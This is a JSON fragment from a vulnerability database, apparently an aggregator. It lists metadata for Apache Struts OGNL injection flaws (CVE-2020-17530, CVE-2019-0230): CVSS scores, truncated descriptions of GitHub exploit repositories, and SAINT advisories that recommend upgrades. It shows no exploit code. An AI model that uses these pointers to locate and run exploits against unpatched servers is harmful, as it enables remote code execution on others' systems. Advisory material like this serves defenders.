Expression Language Injection in Apache Struts", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17530"], "modified": "2022-04-15T01:43:32", "id": "3640EAF9-330F-508E-A488-D3A51649AD96", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-19T20:44:05", "description": "# CVE-2020-17530\nApache Struts2\u6846\u67b6\u662f\u4e00\u4e2a\u7528\u4e8e\u5f00\u53d1Java EE\u7f51\u7edc\u5e94\u7528\u7a0b\u5e8f\u7684Web\u6846\u67b6\u3002Apac...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-08T11:10:46", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Apache Struts", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", 
"authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17530"], "modified": "2022-03-19T17:50:51", "id": "C878132C-FB46-5C51-9D3B-B87DB3578112", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "# freemarker_RCE_struts2_s2-061\n(c...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-18T07:03:57", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Apache Struts", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17530"], "modified": "2020-12-18T07:05:31", "id": "B2E1F725-D74D-5E81-88CC-6530BC9BAB30", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "# CVE-2020-17530-s2-061\n> s2-061\u56fe\u5f62\u5316\u754c\u9762\u7684exp\uff0con...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", 
"attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-24T07:51:31", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Apache Struts", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17530"], "modified": "2021-01-24T08:15:39", "id": "BC46DAAE-9274-500B-A6A2-DB7DA8EAF068", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-23T13:38:20", "description": "S2-061\n\n\u811a\u672c\u7686\u6839\u636evulhub\u7684struts2-059/061\u6f0f\u6d1e\u6d4b\u8bd5\u73af\u5883\u6765\u5199\u7684\uff0c\u4e0d\u5177\u666e\u904d\u6027\uff0c\u8fd8\u671b\u5927\u4f6c\u591a\u591a\u6307\u6559\n\n- s...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-10T17:42:37", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Apache Struts", "bulletinFamily": "exploit", "cvss2": 
{"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17530"], "modified": "2022-06-23T05:10:40", "id": "32FB08A0-ACB0-5E2F-8691-570E7B806086", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-26T20:54:51", "description": "# CVE-2020-17530\n\nQuick POC for [CVE-2020-17530](https://nvd.nis...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-30T17:23:20", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Apache Struts", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17530"], "modified": "2022-07-26T16:55:43", "id": 
"7247E67F-6DD7-5526-8312-91D0D99FED26", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-19T02:22:13", "description": "## What's this\r\nThis is a Simple test Project for S2-061 which c...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-13T11:02:15", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Apache Struts", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17530"], "modified": "2022-07-18T20:20:58", "id": "EF22B1BD-85C3-525C-B7D6-94014939E96B", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-23T23:04:36", "description": "# CVE-2019-0230\nCVE-2019-0230 Exploit\n\nThis is CVE-2019-0...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-22T17:55:10", "type": "githubexploit", "title": "Exploit for Improperly Controlled Modification of Dynamically-Determined Object Attributes in Apache Struts", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230"], "modified": "2021-10-25T12:46:45", "id": "BD05B538-25EA-5C42-AE8D-229D78B57CB1", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-23T23:05:07", "description": "# CVE-2019-0230\nCVE-2019-0230 Exploit\n\nThis is CVE-2019-0...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-08-13T13:05:36", "type": "githubexploit", "title": "Exploit for Improperly Controlled Modification of Dynamically-Determined Object Attributes in Apache Struts", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": 
"PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230"], "modified": "2021-12-29T12:51:47", "id": "5E7409E5-7716-5F40-999C-E6622B806F5E", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-23T23:10:04", "description": "# CVE-2019-0230_Struts2S2-059\n\n## How to use\n\n### Build Struts25...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-11T18:57:14", "type": "githubexploit", "title": "Exploit for Improperly Controlled Modification of Dynamically-Determined Object Attributes in Apache Struts", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230"], "modified": "2021-08-27T17:41:18", "id": "453574C2-C801-529D-A0A6-5C5E1471F1AC", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-01T05:29:19", 
"description": "## What's this\r\nThis is a Simple test Project for S2-059 which c...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-11T03:40:04", "type": "githubexploit", "title": "Exploit for Improperly Controlled Modification of Dynamically-Determined Object Attributes in Apache Struts", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230"], "modified": "2022-08-01T02:16:43", "id": "4E339DB6-4704-5991-B690-DF8D7307532E", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-23T23:13:19", "description": "CVE-2019-0230\nCVE-2019-0230 Exploit\n\nThis is CVE-20...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-08-13T13:31:52", 
"type": "githubexploit", "title": "Exploit for Improperly Controlled Modification of Dynamically-Determined Object Attributes in Apache Struts", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230"], "modified": "2021-03-14T04:43:03", "id": "B1E738E0-BF1B-50E1-88E2-1D265CF9AEB8", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:59:11", "description": "1. Recently, an Apache Struts2 remote code execution vulnerability was discovered (CVE ID: CVE-2020-17530). Apache Str...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-12-09T12:34:54", "type": "githubexploit", "title": "Exploit for Incorrect Permission Assignment for Critical Resource in Apache Accumulo", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": 
"PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17533", "CVE-2020-17530"], "modified": "2021-09-09T13:27:49", "id": "2691C74B-4ECB-5E22-8BDF-7784E321BE55", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "saint": [{"lastseen": "2023-06-19T20:31:16", "description": "Added: 04/26/2022 \n\n\n### Background\n\nApache Struts is an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model-view-controller (MVC) architecture. \n\nStruts uses Object-Graph Navigation Language (OGNL) to provide extensive expression evaluation capabilities. \n\n### Problem\n\nA vulnerability in Apache Struts could allow remote attackers to execute arbitrary commands if the application uses forced OGNL evaluation on user input. This vulnerability exists due to an incomplete fix for CVE-2020-17530. \n\n### Resolution\n\n[Upgrade](<https://struts.apache.org/download.cgi>) to Apache Struts 2.5.30 or higher. 
\n\n### References\n\n<https://cwiki.apache.org/confluence/display/WW/S2-062> \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-26T00:00:00", "type": "saint", "title": "Apache Struts forced OGNL evaluation incomplete fix", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17530"], "modified": "2022-04-26T00:00:00", "id": "SAINT:61E99B83D8C03F67350245D1B8BDC99C", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/struts_forced_ognl2", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-06T16:29:26", "description": "Added: 04/26/2022 \n\n\n### Background\n\nApache Struts is an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model-view-controller (MVC) architecture. \n\nStruts uses Object-Graph Navigation Language (OGNL) to provide extensive expression evaluation capabilities. 
\n\n### Problem\n\nA vulnerability in Apache Struts could allow remote attackers to execute arbitrary commands if the application uses forced OGNL evaluation on user input. This vulnerability exists due to an incomplete fix for CVE-2020-17530. \n\n### Resolution\n\n[Upgrade](<https://struts.apache.org/download.cgi>) to Apache Struts 2.5.30 or higher. \n\n### References\n\n<https://cwiki.apache.org/confluence/display/WW/S2-062> \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-26T00:00:00", "type": "saint", "title": "Apache Struts forced OGNL evaluation incomplete fix", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17530"], "modified": "2022-04-26T00:00:00", "id": "SAINT:D1B88155F516D415CE4F67A190458DDB", "href": "https://download.saintcorporation.com/cgi-bin/exploit_info/struts_forced_ognl2", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-13T15:01:30", "description": "Added: 11/27/2020 \nCVE: [CVE-2019-0230](<https://vulners.com/cve/CVE-2019-0230>) \n\n\n### Background\n\nApache Struts is an open-source web application framework for 
developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model-view-controller (MVC) architecture. \n\nStruts uses Object-Graph Navigation Language (OGNL) to provide extensive expression evaluation capabilities. \n\n### Problem\n\nApache Struts can be forced to use double OGNL evaluation, which could allow a remote attacker to execute arbitrary code by sending a specially crafted request. \n\n### Resolution\n\n[Upgrade](<http://struts.apache.org/download.cgi#struts23151>) to Struts 2.5.22 or higher. \n\n### References\n\n<https://cwiki.apache.org/confluence/display/ww/s2-059> \n\n\n### Limitations\n\ncurl must be installed on the target for this exploit to succeed. \n\n### Platforms\n\nLinux \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-27T00:00:00", "type": "saint", "title": "Apache Struts double OGNL evaluation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230"], "modified": "2020-11-27T00:00:00", "id": "SAINT:891A42933A0DE986694E3B7D51B3F2F1", "href": 
"https://download.saintcorporation.com/cgi-bin/exploit_info/struts_double_ognl", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:33:35", "description": "Added: 11/27/2020 \nCVE: [CVE-2019-0230](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0230>) \n\n\n### Background\n\nApache Struts is an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model-view-controller (MVC) architecture. \n\nStruts uses Object-Graph Navigation Language (OGNL) to provide extensive expression evaluation capabilities. \n\n### Problem\n\nApache Struts can be forced to use double OGNL evaluation, which could allow a remote attacker to execute arbitrary code by sending a specially crafted request. \n\n### Resolution\n\n[Upgrade](<http://struts.apache.org/download.cgi#struts23151>) to Struts 2.5.22 or higher. \n\n### References\n\n<https://cwiki.apache.org/confluence/display/ww/s2-059> \n\n\n### Limitations\n\ncurl must be installed on the target for this exploit to succeed. 
\n\n### Platforms\n\nLinux \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-11-27T00:00:00", "type": "saint", "title": "Apache Struts double OGNL evaluation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230"], "modified": "2020-11-27T00:00:00", "id": "SAINT:AE1DA80E6B0E4C12B5D781794166897B", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/struts_double_ognl", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-19T20:33:36", "description": "Added: 11/27/2020 \nCVE: [CVE-2019-0230](<https://vulners.com/cve/CVE-2019-0230>) \n\n\n### Background\n\nApache Struts is an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model-view-controller (MVC) architecture. \n\nStruts uses Object-Graph Navigation Language (OGNL) to provide extensive expression evaluation capabilities. 
\n\n### Problem\n\nApache Struts can be forced to use double OGNL evaluation, which could allow a remote attacker to execute arbitrary code by sending a specially crafted request. \n\n### Resolution\n\n[Upgrade](<http://struts.apache.org/download.cgi#struts23151>) to Struts 2.5.22 or higher. \n\n### References\n\n<https://cwiki.apache.org/confluence/display/ww/s2-059> \n\n\n### Limitations\n\ncurl must be installed on the target for this exploit to succeed. \n\n### Platforms\n\nLinux \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, 